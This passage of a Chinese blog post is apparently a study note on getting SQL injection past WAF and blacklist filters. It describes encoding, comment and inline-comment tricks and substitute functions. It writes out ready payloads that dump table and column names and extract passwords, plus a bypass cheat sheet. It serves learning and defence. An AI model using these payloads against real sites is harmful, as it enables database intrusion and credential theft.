<p>  两个示例中，前者利用双字节绕过，比如对单引号转义操作变成\，那么就变成了%D6%5C，%D6%5C构成了一个款字节即Unicode字节，单引号可以正常使用第二个示例使用的是两种不同编码的字符的比较，它们比较的结果可能是True或者False，关键在于Unicode编码种类繁多，基于黑名单的过滤器无法处理所以情况，从而实现绕过
  另外平时听得多一点的可能是utf-7的绕过，还有utf-16、utf-32的绕过，后者从成功的实现对google的绕过，有兴趣的朋友可以去了解下常见的编码当然还有二进制、八进制，它们不一定都派得上用场，但后面会提到使用二进制的</p>

<p>例子:</p>

<ol>
  <li>使用注释</li>
</ol>

<p>看一下常见的用于注释的符号有哪些：</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    //, -- , /**/, #, --+,--  -, ;，--a
</code></pre></div></div>

<ul>
  <li>普通注释</li>
</ul>

<p>举例：
z.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4</p>

<p>  /**/在构造得查询语句中插入注释，规避对空格的依赖或关键字识别;#、–+用于终结语句的查询</p>

<ul>
  <li>内联注释</li>
</ul>

<p>  相比普通注释，内联注释用的更多，它有一个特性/!**/只有MySQL能识别</p>

<p>举例:
index.php?page_id=-15 /<em>!UNION</em>/ /<em>!SELECT</em>/ 1,2,3</p>

<blockquote>
  <p>?page_id=null%0A/<strong>//<em>!50000%55nIOn</em>//<em>yoyu</em>/all/</strong>/%0A/<em>!%53eLEct</em>/%0A/<em>nnaa</em>/+1,2,3,4…</p>
</blockquote>

<p>  两个示例中前者使用内联注释，后者还用到了普通注释。使用注释一个很有用的做法便是对关键字的拆分，要做到这一点后面讨论的特殊符号也能实现，当然前提是包括/、*在内的这些字符能正常使用</p>

<ol>
  <li>等价函数与命令
 有些函数或命令因其关键字被检测出来而无法使用，但是在很多情况下可以使用与之等价或类似的代码替代其使用</li>
</ol>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">hex</span><span class="p">()</span><span class="err">、</span><span class="n">bin</span><span class="p">()</span> <span class="o">==&gt;</span> <span class="n">ascii</span><span class="p">()</span>
<span class="n">sleep</span><span class="p">()</span> <span class="o">==&gt;</span><span class="n">benchmark</span><span class="p">()</span>
<span class="n">concat_ws</span><span class="p">()</span><span class="o">==&gt;</span><span class="n">group_concat</span><span class="p">()</span>
<span class="n">mid</span><span class="p">()</span><span class="err">、</span><span class="n">substr</span><span class="p">()</span> <span class="o">==&gt;</span> <span class="k">substring</span><span class="p">()</span>
<span class="o">@@</span><span class="k">user</span> <span class="o">==&gt;</span> <span class="k">user</span><span class="p">()</span>
<span class="o">@@</span><span class="n">datadir</span> <span class="o">==&gt;</span> <span class="n">datadir</span><span class="p">()</span>
</code></pre></div></div>
<p>例如:
substring()和substr()无法使用时：</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">+</span><span class="k">and</span><span class="o">+</span><span class="n">ascii</span><span class="p">(</span><span class="k">lower</span><span class="p">(</span><span class="n">mid</span><span class="p">((</span><span class="k">select</span><span class="o">+</span><span class="n">pwd</span><span class="o">+</span><span class="k">from</span><span class="o">+</span><span class="n">users</span><span class="o">+</span><span class="k">limit</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="o">=</span><span class="mi">74</span><span class="err">　</span>
</code></pre></div></div>

<ul>
  <li>
    <p>特殊符号
利用反引号等符号,或用@定义变量,或用+号连接被拆分的字符串</p>
  </li>
  <li>
    <p>HTTP参数控制
重复发送同一个参数,不太常见</p>
  </li>
  <li>
    <p>缓冲区溢出
跟基于报错那个差不多</p>
  </li>
  <li>
    <p>整合绕过
把前面说的合起来</p>
  </li>
</ul>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">z</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="k">index</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">page_id</span><span class="o">=-</span><span class="mi">15</span><span class="o">+</span><span class="k">and</span><span class="o">+</span><span class="p">(</span><span class="k">select</span> <span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="p">(</span><span class="k">Select</span> <span class="mi">0</span><span class="n">xAA</span><span class="p">[..(</span><span class="k">add</span> <span class="n">about</span> <span class="mi">1000</span> <span class="nv">"A"</span><span class="p">)..])</span><span class="o">+</span><span class="cm">/*!uNIOn*/</span><span class="o">+</span><span class="cm">/*!SeLECt*/</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span>

<span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="cm">/*!UnIoN*/</span><span class="o">+</span><span class="k">SeLeCT</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="n">concat</span><span class="p">(</span><span class="cm">/*!table_name*/</span><span class="p">)</span><span class="o">+</span><span class="k">FrOM</span> <span class="cm">/*information_schema*/</span><span class="p">.</span><span class="n">tables</span> <span class="cm">/*!WHERE */</span><span class="o">+/</span>  <span class="o">*!</span><span class="n">TaBlE_ScHeMa</span><span class="o">*/+</span><span class="k">like</span><span class="o">+</span><span class="k">database</span><span class="p">()</span> <span class="o">-</span>
<span class="o">?</span><span class="n">id</span><span class="o">=-</span><span class="mi">725</span><span class="o">+</span><span class="cm">/*!UNION*/</span><span class="o">+</span><span class="cm">/*!SELECT*/</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span><span class="n">GrOUp_COnCaT</span><span class="p">(</span><span class="k">COLUMN_NAME</span><span class="p">),</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="o">+</span><span class="k">FROM</span><span class="o">+</span><span class="cm">/*!INFORMATION_SCHEM*/</span><span class="p">.</span><span class="n">COLUMNS</span><span class="o">+</span><span class="k">WHERE</span><span class="o">+</span><span class="k">TABLE_NAME</span><span class="o">=</span><span class="mi">0</span><span class="n">x41646d696e</span><span class="c1">--</span>
</code></pre></div></div>

<p>速记:</p>
<ul>
  <li>空格过滤:
    <ul>
      <li>注释</li>
      <li>%20 %09 %0a %0d %0b %0c %0d %a0等url编码</li>
    </ul>
  </li>
  <li>逗号过滤
    <ul>
      <li>用JOIN()绕过</li>
      <li>用select绕过</li>
    </ul>
  </li>
</ul>

<p><a href="http://drops.xmd5.com/static/drops/tips-7840.html">参考文章</a></p>


<div id="vcomments"></div>
<script>
  new Valine({
    el: '#vcomments',
    appId: '9PQd0VOdLBtIrk7DuYhbXgo1-gzGzoHsz',
    appKey: '0tooNX9XI400l94QiuBP0lXm',

    avatar:'robohash',
    visitor: true, // 阅读量统计
    enableQQ: true
  })
</script>

<!-- id 将作为查询条件 -->
<span id=/blog/chaitin%E9%9D%A2%E8%AF%95%E7%BB%8F%E5%8E%86 class="leancloud_visitors" data-flag-title="Your Article Title">
  <em class="post-meta-item-text">阅读量 </em>
  <i class="leancloud-visitors-count"></i>
</span>

</div>
  </main>

  <footer class="mt-auto py-3 text-center">

  <small class="text-muted mb-2">
    <i class="fas fa-code"></i> with <i class="fas fa-heart"></i>
    by <strong>dyf</strong>
  </small>

  <div class="container-fluid justify-content-center">

</div><small id="attribution">
    theme <a href="https://github.com/YoussefRaafatNasry/portfolYOU">portfolYOU</a>
  </small>
  
</footer>
  <!-- GitHub Buttons -->
<script async defer src="https://buttons.github.io/buttons.js"></script>

<!-- jQuery CDN -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<!-- Popper.js CDN -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js"></script>

<!-- Bootstrap JS CDN -->
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>

<!-- wow.js CDN & Activation -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/wow/1.1.2/wow.js"></script>
<script> new WOW().init(); </script>

<!-- Initialize all tooltips -->
<script>
$(function () {
    $('[data-toggle="tooltip"]').tooltip()
})
</script>

</body>

</html>